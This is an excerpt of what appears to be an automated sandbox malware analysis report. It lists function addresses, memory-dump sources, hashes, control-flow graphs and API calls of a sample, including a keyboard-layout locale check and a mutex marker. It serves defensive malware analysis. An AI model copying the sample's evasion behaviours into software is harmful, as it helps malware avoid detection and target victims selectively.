                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                                                                            • Opcode ID: 3fdca13102fb69e85e3ee0a61e7af95c0bcb0104dd1a24ce668df37bfb42340d
                                                                                                                                                                                                                                                            • Instruction ID: 9f2117c2dabfd398dc7baf43473295d02d0e244a8831690161ca69a78732bdc8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fdca13102fb69e85e3ee0a61e7af95c0bcb0104dd1a24ce668df37bfb42340d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AE086302422886FCF36BB59CC05D883B5AEB61785F040414F80586225CB25ED51C550
                                                                                                                                                                                                                                                            Function 04DA0B3E Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1897916150.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4da0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 5e692dd97b8d71ee014cf063b54e21dab8e402348b97b9b338eeeb58db005971
                                                                                                                                                                                                                                                            • Instruction ID: e3f4935cfbe50ea0b2062e9113811c224cb4d9655ec6b358caa0ae8a0db9dee3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e692dd97b8d71ee014cf063b54e21dab8e402348b97b9b338eeeb58db005971
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A90126B6208110FEA2438D915724AFA2B24DBD53207308426F887D6201F2299A7DF131
                                                                                                                                                                                                                                                            Function 006B5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                            • API String ID: 0-3963862150
                                                                                                                                                                                                                                                            • Opcode ID: a8f8637ee830e53cafe28252ff12952f4785d4a4252c0226135a6700001a30bf
                                                                                                                                                                                                                                                            • Instruction ID: 7dec1294426b91743257d293c6e43f7d28ddc83cdcc4a5f82e4eb7141a5a8a3a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8f8637ee830e53cafe28252ff12952f4785d4a4252c0226135a6700001a30bf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5EF1C4B0A002589FEB24DF54CC85BEEB7BAEB44304F5042ADF509A7281DB749A84CF95
                                                                                                                                                                                                                                                            Function 006B9BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 92 6b9ba5-6b9d91 call 6c7a00 call 6b5c10 call 6b8b30 call 6c8220
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 006BA963
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                            • String ID: T2q
                                                                                                                                                                                                                                                            • API String ID: 1464230837-1585859237
                                                                                                                                                                                                                                                            • Opcode ID: c3840fc7c481aec75acd7fc8e619f10acf5b4f69d7ffb5bdc9987a29a5c2da4c
                                                                                                                                                                                                                                                            • Instruction ID: d7b4e1423bf4e99c1f4e443fff08e9fc8b194a5a572822a79093487ce7791888
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3840fc7c481aec75acd7fc8e619f10acf5b4f69d7ffb5bdc9987a29a5c2da4c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 273128B17142009BEB18EB7CDC85BEDBBA3EB81314F208258E014D73D6C77559C18761
                                                                                                                                                                                                                                                            Function 006B9F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 114 6b9f44-6b9f64 118 6b9f92-6b9fae 114->118 119 6b9f66-6b9f72 114->119 122 6b9fdc-6b9ffb 118->122 123 6b9fb0-6b9fbc 118->123 120 6b9f88-6b9f8f call 6cd663 119->120 121 6b9f74-6b9f82 119->121 120->118 121->120 126 6ba92b 121->126 124 6ba029-6ba916 call 6c80c0 122->124 125 6b9ffd-6ba009 122->125 128 6b9fbe-6b9fcc 123->128 129 6b9fd2-6b9fd9 call 6cd663 123->129 130 6ba00b-6ba019 125->130 131 6ba01f-6ba026 call 6cd663 125->131 133 6ba953-6ba994 Sleep CreateMutexA 126->133 134 6ba92b call 6e6c6a 126->134 128->126 128->129 129->122 130->126 130->131 131->124 143 6ba9a7-6ba9a8 133->143 144 6ba996-6ba998 133->144 134->133 144->143 146 6ba99a-6ba9a5 144->146 146->143
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 006BA963
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                            • String ID: T2q
                                                                                                                                                                                                                                                            • API String ID: 1464230837-1585859237
                                                                                                                                                                                                                                                            • Opcode ID: 7b87932d4dfb9a8dc18fc4fa953eb5b8434158b9d904c42c54a8d99f20a6f578
                                                                                                                                                                                                                                                            • Instruction ID: 380af1a23134374d4423b2bc9f6b84865b9fbc290d64ed02473625f4bdc13510
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b87932d4dfb9a8dc18fc4fa953eb5b8434158b9d904c42c54a8d99f20a6f578
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 903128B17102049BEB18ABA8D884BECBB67EB85314F20821DE014EB3D5C77599C18722
                                                                                                                                                                                                                                                            Function 006BA079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

